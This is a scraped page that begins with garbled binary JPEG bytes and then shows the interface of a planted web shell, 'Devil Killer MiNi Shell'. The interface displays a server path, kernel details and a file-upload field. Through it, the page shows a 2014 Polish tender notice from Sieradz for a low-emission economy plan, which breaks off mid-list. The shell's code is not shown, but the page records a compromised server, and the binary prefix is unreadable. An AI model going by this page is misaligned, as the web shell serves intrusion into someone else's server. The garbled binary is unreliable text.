JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140820/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140820/276452-N-2014.html

<p class="kh_header"><b>Sieradz: Przygotowanie Planu Gospodarki Niskoemisyjnej dla miasta Sieradza</b><br>
<b>Numer ogłoszenia: 276452 - 2014; data zamieszczenia: 20.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Sieradz , plac Wojewódzki 1, 98-200 Sieradz, woj. łódzkie, tel. 43 826 61 28, faks 43 822 30 05.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sieradz.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przygotowanie Planu Gospodarki Niskoemisyjnej dla miasta Sieradza.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
1) stworzenie bazy danych - inwentaryzacja odbiorców energii wraz z badaniami przeprowadzonymi na reprezentatywnej grupie oraz graficznym przedstawieniem bazy danych w programie typu GIS z możliwością edycji i aktualizacji danych:
a) baza danych uwzględniać będzie w szczególności następujące elementy:
- emisyjność z transportu i komunikacji publicznej,
- emisyjność z obiektów publicznych oraz z budynków mieszkalnych należących do miasta Sieradza, w tym stan techniczny nieruchomości (poprzez wskazanie czy i w jakim zakresie w obiektach dokonywano prac termomodernizacyjnych,  oraz określenie najbardziej pilnych inwestycji termo modernizacyjnych np. ocieplenie, podłączenie do sieci itp.), wskazanie źródeł ciepła i ilości zużywanego paliwa, określenie zużycia energii elektrycznej, pozostałych podstawowych parametrów budynków (rok budowy, rok modernizacji, kubatura, ilość kondygnacji, ilość lokali w przypadku obiektów mieszkalnych i usługowych),
- emisyjność z budynków mieszkalnych i przedsiębiorstw - na bazie badań jakościowych, poprzez przeprowadzenie indywidualnych wywiadów pogłębionych (bądź w formie zaproponowanej przez Wykonawcę) na wytypowanej grupie reprezentatywnej, pozyskaniu danych z zakładów energetycznych działających na terenie miasta (w szczególności zużycia energii w taryfach G - dla obiektów mieszkalnych oraz taryfach C, B, A dla obiektów gospodarczych) oraz zakładu ciepłowniczego (w zakresie ilości przyłączonych obiektów i zużycia ciepła). Badania dotyczące przedsiębiorstw i instytucji mogą odbywać się w godz. 8.00-14.00 - po wcześniejszym ustaleniu jednostki badawczej z danym przedsiębiorstwem/ instytucją, natomiast wśród wybranej przez badającego grupy docelowej mieszkańców w godz. 17.00-19.00 - z wyłączeniem weekendów. Wyniki badań wraz z wnioskami końcowymi przedstawione zostaną Zamawiającemu w formie raportu,
- emisyjność infrastruktury oświetleniowej - miejska infrastruktura oświetleniowa pod kątem stanu technicznego, zużycia energii, oraz emisji CO2;
b) inwentaryzacja musi być sporządzona w formie bazy danych na arkuszach typu MS Excel (lub równoważnym) oraz w ramach części opisowej w plikach tekstowych typu MS Word (lub równoważnym). Wykonawca zobowiązany będzie także do graficznego przedstawienia bazy danych w programie typu GIS. Prezentacja musi mieć charakter punktowy - obiekty i budynki zostaną oznaczone punktami, do których przypisane będą atrybuty pozyskane w ramach inwentaryzacji (rok budowy, źródło ciepła, emisyjność, kubatura itp.). Atrybuty będą przedstawiane w formie tabelarycznej (jako zestawienie), w formie raportów (np. suma emisyjności wybranych obiektów, średnia emisyjność) bądź na podkładzie mapowym (ortofoto) w którym kolor punktów przypisanych do obiektów uzależniony będzie od wybranego atrybutu;
2) opracowanie projektu założeń do planu zaopatrzenia w ciepło, energię elektryczną i paliwa gazowe dla miasta Sieradza na lata 2014 - 2030:
a) projekt założeń należy opracować zgodnie z obowiązującymi przepisami ustawy Prawo Energetyczne, z jednoczesnym uwzględnieniem dokumentów programowych związanych z polityką energetyczną państwa, lokalnym planowaniem przestrzennym i ochroną środowiska oraz planami rozwoju miasta i przedsiębiorstw energetycznych obsługujących miasto. 
Celem opracowania jest diagnoza obecnych potrzeb energetycznych i sposób ich zaspokajania na terenie gminy, określenie potrzeb energetycznych oraz źródeł i ich pokrycia z uwzględnieniem planowanego rozwoju gminy i sektora energetycznego;
b) zakres opracowania obejmuje:
- opracowanie projektu założeń do planu w zakresie ustawowym,
- uzyskanie pozytywnej opinii samorządu województwa w zakresie koordynacji współpracy z innymi gminami oraz w zakresie zgodności z założeniami polityki energetycznej państwa oraz innych wymaganych prawem opinii (strategiczna ocena oddziaływania na środowisko),
- przygotowanie i wyłożenie dokumentu do publicznego wglądu/konsultacji społecznych,
-wymagane jest przeprowadzenie 1 spotkania konsultacyjnego w Sieradzu, (działania informacyjno-promocyjne oraz salę do zorganizowania konsultacji wraz ze sprzętem audiowizualnym zapewni Zamawiający),
-Wykonawca przedstawi do akceptacji Zamawiającego metodę oraz procedurę konsultacji społecznych, w tym ankietę (mającą na celu zebranie opinii i sugestii społeczeństwa), która będzie zamieszczona na stronach internetowych  
i w siedzibie Zamawiającego,
-Wykonawca zobowiązany będzie do zebrania, podsumowania wyników konsultacji społecznych oraz sformułowania wniosków i wskazania Zamawiającemu w jaki sposób zostaną one uwzględnione w opracowaniu,
- wprowadzenie ewentualnych poprawek i uwag do projektu,
- przygotowanie dokumentu projektu założeń do uchwalenia przez Radę Miejską w Sieradzu,
- udział przedstawiciela Wykonawcy i przedstawienie założeń do planu podczas obrad Komisji Rady Miejskiej w Sieradzu,
- udział przedstawiciela Wykonawcy (eksperta) podczas obrad sesji Rady Miejskiej w Sieradzu, na której planowane jest przyjęcie stosownej uchwały oraz przedstawienie radnym prezentacji uchwały - projektu założeń do planu zaopatrzenia w ciepło, energię elektryczna i paliwa gazowe dla miasta Sieradza na lata 2014-2030;
c) Wykonawca zobowiązany jest do wykonywania czynności związanych z opiniowaniem, uzgodnieniami, prowadzeniem korespondencji w zakresie opracowania założeń do planu zaopatrzenia, występując w tym zakresie w imieniu Zamawiającego - w tym do przygotowania wzoru pism (ogłoszeń, obwieszczeń, informacji prasowych);
d) wymogi techniczne opracowania:
- materiały stanowiące przedmiot odbioru należy opracować w formie tradycyjnej w 6 egzemplarzach (tekstowej i graficznej, załączniki mapowe), a także w wersji elektronicznej na nośnikach DVD w 6 egzemplarzach,
- tekst opracowania: format docx, xlsx i pdf,
- załączniki mapowe: format jpg, tiff, dwg, dxf.
e) opracowanie winno uwzględniać:
- zmiany aktów prawnych i dokumentów programowych tworzonych na etapie powstawania opracowania;
- uwarunkowania wynikające z polityki energetycznej Polski, w szczególności:
-ograniczenia wzrostu zużycia energii, większe bezpieczeństwo energetyczne - zmniejszenie uzależnienia od importu i monopolu na rynku, redukcja emisji, odnawialne źródła energii, czyste technologie, energia jądrowa;
-  wymogi stawiane systemom energetycznym i ich operatorom wynikające z ustawy Prawo Energetyczne:
-możliwość rozbudowy struktur systemów dla zapewnienia właściwego poziomu zaopatrzenia energetycznego w obszarach wskazanych jako rozwojowe z uwzględnieniem ich funkcji w mieście w perspektywie do 2030 roku,
-zapewnienie ciągłości zaopatrzenia w energię na poziomie oczekiwanym przez odbiorców, np. zwiększenie przepustowości systemów przesyłowych, modernizacja i rozbudowa mocy wytwórczych,
-zapewnienie bezpieczeństwa systemów energetycznych (odporność na zakłócenia zewnętrzne),
-zapewnienie zgodności planów rozwoju przedsiębiorstw energetycznych z opracowanymi założeniami (korelacja planów inwestycyjnych miasta Sieradza, strategii rozwoju miasta na lata 2010-2020 z planami przedsiębiorstw energetycznych),
-  prognozę bilansu zapotrzebowania na ciepło, energię elektryczną i paliwa gazowe,
-  wytyczne do rozbudowy systemów zaopatrzenia w ciepło, energię elektryczną i paliwa gazowe.
3) opracowanie Planu Gospodarki Niskoemisyjnej (PGN) dla miasta Sieradza na lata 2014 - 2020: 
a) PGN spełniać ma wytyczne metodyki określone przez Narodowy Fundusz Ochrony Środowiska i Gospodarki Wodnej, a także odnosić się do zaleceń wynikających z poradnika Jak opracować plan działań na rzecz zrównoważonej energii (SEAP)?. PGN powinien być zgodny ze Szczegółowymi zaleceniami dotyczącymi struktury planu gospodarki niskoemisyjnej (załącznik nr 9 do regulaminu konkursu nr 2/PO IiŚ/9.3/2013, ogłoszonego przez NFOŚiGW). Dokument należy opracować spójnie z obowiązującymi dokumentami programowymi związanymi z polityką energetyczną państwa, lokalnym planowaniem przestrzennym i ochroną środowiska oraz planami rozwoju miasta 
i przedsiębiorstw energetycznych obsługujących miasto oraz założeniami do planu zaopatrzenia w ciepło, energię elektryczną i paliwa gazowe dla miasta Sieradza na lata 2014 - 2030, o których mowa wyżej.
Cele opracowania to:
- redukcja emisji gazów cieplarnianych,
- zwiększenie udziału energii pochodzącej ze źródeł odnawialnych,
- redukcja zużycia energii finalnej, co ma zostać zrealizowane poprzez podniesienie efektywności energetycznej,
- poprawa jakości powietrza, na obszarach, na których odnotowano przekroczenia jakości poziomów dopuszczalnych stężeń w powietrzu i realizowane są programy (naprawcze) ochrony powietrza (POP) oraz plany działań krótkoterminowych (PDK).
Działania zawarte w planach muszą być spójne z tworzonymi POP i PDK oraz w efekcie doprowadzić do redukcji emisji zanieczyszczeń do powietrza (w tym: pyłów, dwutlenku siarki oraz tlenków azotu); 
b) zakres opracowania:
- objęcie PGN całości obszaru geograficznego gminy,
- charakterystyka miasta Sieradza (pod względem lokalizacji, ludności, istniejącej infrastruktury, analizę otoczenia gospodarczego),
- opis wraz z uzasadnieniem metodologii przyjętych w ramach inwentaryzacji,
- bilans emisji z obszaru miasta w stanie aktualnym i w porównaniu do okresu bazowego,
- analiza i identyfikacja głównych źródeł emisji (w sektorach oświetlenia, przemysłu, transportu, budynków mieszalnych, obiektach należących do miasta Sieradz),
- wskazanie kluczowych obszarów działań, czyli możliwości działań o charakterze inwestycyjnym i nie inwestycyjnym (np. szkolenia lub kampanie informacyjne), które w największym stopniu mogą przyczynić się do obniżenia emisyjności gminy,
- wskazanie możliwych sposobów finansowania inwestycji wraz z analizą ekonomiczną,
- wyznaczenie celów oraz metody ich weryfikacji,
- wyznaczenie wskaźników do monitorowania oraz metod monitoringu,
- zalecenia dot. aktualizacji planu gospodarki niskoemisyjnej oraz  innych dokumentów strategicznych w gminie,
- skoncentrowanie się na działaniach niskoemisyjnych i efektywnie wykorzystujących zasoby, w tym poprawie efektywności energetycznej, wykorzystaniu OZE, czyli wszystkich działań mających na celu zmniejszenie emisji zanieczyszczeń do powietrza w tym pyłów, dwutlenku siarki, tlenków azotu oraz emisji dwutlenku węgla, ze szczególnym uwzględnieniem obszarów, na których odnotowano przekroczenia dopuszczalnych stężeń w powietrzu,
- współuczestnictwo podmiotów będących producentami i/lub odbiorcami energii (z wyjątkiem instalacji objętych systemem EU ETS) ze szczególnym uwzględnieniem działań w sektorze publicznym,
- objęcie PGN obszarów, w których władze lokalne mają wpływ na zużycie energii w perspektywie długoterminowej (w tym planowanie przestrzenne),
- podjęcie działań mających na celu wspieranie produktów i usług efektywnych energetycznie (np. zamówienia publiczne),
- podjęcie działań mających wpływ na zmiany postaw konsumpcyjnych użytkowników energii (współpraca z mieszkańcami i zainteresowanymi stronami, działania edukacyjne),
- spójność z nowotworzonymi bądź aktualizowanymi założeniami do planów zaopatrzenia w ciepło, chłód i energię elektryczną bądź paliwa gazowe (lub założeniami do tych planów) i programami ochrony powietrza;
c) podstawowe wymagania wobec PGN:
- spójność z innymi planami/programami (miejscowy plan zagospodarowania przestrzennego, założenia/plan zaopatrzenia w ciepło, energię elektryczną i paliwa gazowe, program ochrony powietrza),
- zgodność z przepisami prawa w zakresie strategicznej oceny oddziaływania na środowisko,
- kompleksowość planu, tj.: wskazanie zadań inwestycyjnych, w następujących obszarach, m.in:
-zużycie energii w budynkach/instalacjach (budynki i urządzenia komunalne, budynki i urządzenia usługowe niekomunalne, budynki mieszkalne, oświetlenie uliczne; zakłady przemysłowe poza EU ETS - fakultatywnie), dystrybucja ciepła,
-zużycie energii w transporcie (transport publiczny, tabor gminny, transport prywatny i komercyjny, transport szynowy), w tym poprzez wdrażanie systemów organizacji ruchu,
-produkcja energii - zakłady/instalacje do produkcji energii elektrycznej, ciepła i chłodu, z wyłączeniem instalacji objętej EU ETS oraz zadań nie inwestycyjnych, takich jak planowanie miejskie, zamówienia publiczne, strategia komunikacyjna, promowanie gospodarki niskoemisyjnej, itp.,
- uzyskanie pozytywnej opinii samorządu województwa w zakresie koordynacji współpracy z innymi gminami oraz w zakresie zgodności z założeniami polityki energetycznej państwa oraz innych wymaganych prawem opinii (strategiczna ocena oddziaływania na środowisko),
- przygotowanie i wyłożenie dokumentu do publicznego wglądu/konsultacji społecznych,
-wymagane jest przeprowadzenie 1 spotkania konsultacyjnego w Sieradzu, (działania informacyjno-promocyjne oraz salę do zorganizowania konsultacji wraz ze sprzętem audiowizualnym zapewni Zamawiający),
-Wykonawca przedstawi do akceptacji Zamawiającego metodę oraz procedurę konsultacji społecznych, w tym ankietę (mającą na celu zebranie opinii i sugestii społeczeństwa), która będzie zamieszczona na stronach internetowych 
i w siedzibie Zamawiającego,
-Wykonawca zobowiązany będzie do zebrania, podsumowania wyników konsultacji społecznych oraz sformułowania wniosków i wskazania Zamawiającemu w jaki sposób zostaną one uwzględnione w PGN,
- wprowadzenie ewentualnych poprawek i uwag do projektu PGN,
- przygotowanie dokumentu PGN do uchwalenia przez Radę Miejską w Sieradzu (wpisanie do WPF),
- udział przedstawiciela Wykonawcy i przedstawienie założeń do PGN podczas obrad Komisji Rady Miejskiej w Sieradzu,
- udział przedstawiciela Wykonawcy (eksperta) podczas obrad sesji Rady Miejskiej w Sieradzu, na której planowane jest przyjęcie stosownej uchwały oraz przedstawienie radnym prezentacji uchwały - Plan Gospodarki Niskoemisyjnej dla miasta Sieradza na lata 2014-2020;
d) Wykonawca zobowiązany jest do wykonywania czynności związanych z opiniowaniem, uzgodnieniami, prowadzeniem korespondencji w zakresie opracowania założeń do planu zaopatrzenia występując w tym zakresie w imieniu Zamawiającego - w tym do przygotowania wzoru pism (ogłoszeń, obwieszczeń, informacji prasowych);
e) wymogi techniczne opracowania:
- materiały stanowiące przedmiot odbioru należy opracować w formie tradycyjnej w 6 egzemplarzach (tekstowej i graficznej, załączniki mapowe), a także w wersji elektronicznej na nośnikach DVD w 6 egzemplarzach,
- tekst opracowania: format docx, xlsx i pdf,
- załączniki mapowe: format jpg, tiff, dwg, dxf.
4) zorganizowanie szkolenia dla pracowników:
a) zorganizowanie szkolenia dla pracowników Zamawiającego nt. problematyki związanej z gospodarką niskoemisyjną, połączonego z wizytą studyjną w gminie, która realizuje inwestycje z zakresu gospodarki niskoemisyjnej. Wizyta studyjna posłuży podniesieniu kompetencji kadr realizujących projekty związane z szeroko pojętą gospodarką niskoemisyjną, poprzez obserwacje warsztatu pracy samorządu zaangażowanego w realizację takich przedsięwzięć. Umożliwi on pracownikom wymianę doświadczeń, nawiązanie kontaktów zawodowych, w zakresie tematów stanowiących przedmiot wspólnego zainteresowania. 
Specyfikacja:
- szkolenie wyjazdowe, preferowany obszar województwa łódzkiego,
- ilość uczestników szkolenia: 20 osób,
- ramowy program:
Dzień 1 (8 godzin szkoleniowych):
-wprowadzenie do zagadnień ochrony klimatu i gospodarki niskoemisyjnej (podstawy naukowe, regulacje prawne, strategie UE oraz Polskie, praktyczne aspekty gospodarki niskoemisyjnej),
-PGN (cel, zakres, struktura, wdrażanie),
-realizacja działań przewidzianych w PGN (struktury odpowiedzialne, koordynacja),
-monitoring realizacji PGN (metodyka monitorowania, zbieranie danych, raportowanie, podział odpowiedzialności);
Dzień 2 (4 godziny szkoleniowe + wizyta studyjna):
-aktualizacja PGN (ewaluacja rezultatów, planowanie działań korygujących, aktualizacja planu),
-wdrożenie i obsługa systemu informacji w programie typu GIS,
-wizyta studyjna (ostateczny program wizyty studyjnej zostanie ustalony w porozumieniu z Zamawiającym).
- Wykonawca w ramach zamówienia zapewni salę szkoleniową, sprzęt niezbędny do prowadzenia szkolenia, materiały szkoleniowe, 1 nocleg dla każdego z uczestników (w miejscu, w którym zlokalizowana będzie sala szkoleniowa), wyżywienie (2x obiad, 1x śniadanie, kolacja),
- Wykonawca zapewni wykładowcę, posiadającego kwalifikacje i umiejętności adekwatne do zakresu programowego szkolenia oraz koordynatora - moderatora podczas wizyty studyjnej,
- Wykonawca zobowiązany będzie do wydania zaświadczeń potwierdzających udział w szkoleniu;
5) realizacja działań informacyjno-promocyjnych:
a) przygotowanie informacji na stronę internetową Urzędu Miasta Sieradza oraz do Biuletynu Informacji Publicznej nt.: faktu opracowania PGN w mieście Sieradz, korzyściach płynących z opracowania PGN, rekomendowanych w planie działaniach, w szczególności tych, które mieszkańcy i przedsiębiorcy mogą podjąć we własnym zakresie, dofinansowaniu projektu ze środków zewnętrznych;
b) Zamieszczenie dwóch artykułów/ogłoszeń w prasie lokalnej informujących o opracowywaniu/opracowaniu PGN i źródle jego finansowania. Parametry artykułów/ogłoszeń: ogłoszenie nie mniejsze niż pół strony redakcyjnej - zgodne z parametrami technicznymi ogłoszeniobiorcy z uwzględnieniem procedury promocji projektów współfinansowanych z UE..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.24.00.00-2, 80.00.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 3.500,00 zł (słownie złotych: trzy tysiące pięćset 00/100).
2.Wykonawca może wnieść wadium w jednej lub kilku formach przewidzianych w art. 45 ust. 6 ustawy PZP, tj.:
1)pieniądzu,
2)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)gwarancjach bankowych,
4)gwarancjach ubezpieczeniowych,
5)poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt. 2 ustawy z dna 9 listopada 2000r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007r. Nr 42, poz. 275 z późniejszymi zmianami).
3.Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
4.Wadium w pieniądzu należy wnieść przelewem na konto Zamawiającego: Bank PKO BP O/Sieradz Nr 86 1020 4564 0000 5502 0040 9680
5.W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego.
6.W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu należy umieścić w odrębnej kopercie załączonej do oferty.
Niewniesienie wadium przed upływem terminu składania ofert spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt. 2 ustawy PZP, a jego oferta zostanie uznana za odrzuconą na podstawie art. 89 ust. 1 pkt. 5 w związku z art. 24 ust. 4 ustawy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby wykaz wykonanych usług zawierał co najmniej dwie usługi polegające na opracowaniu dokumentów z zakresu gospodarki niskoemisyjnej i efektywności energetycznej dla miast powyżej 40 tys. mieszkańców o wartości minimum 50.000,00 zł brutto każda, wraz z dowodami potwierdzającymi należyte wykonanie prac (dowodem potwierdzającym, że usługi zostały wykonane prawidłowo może być np.: poświadczenie)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
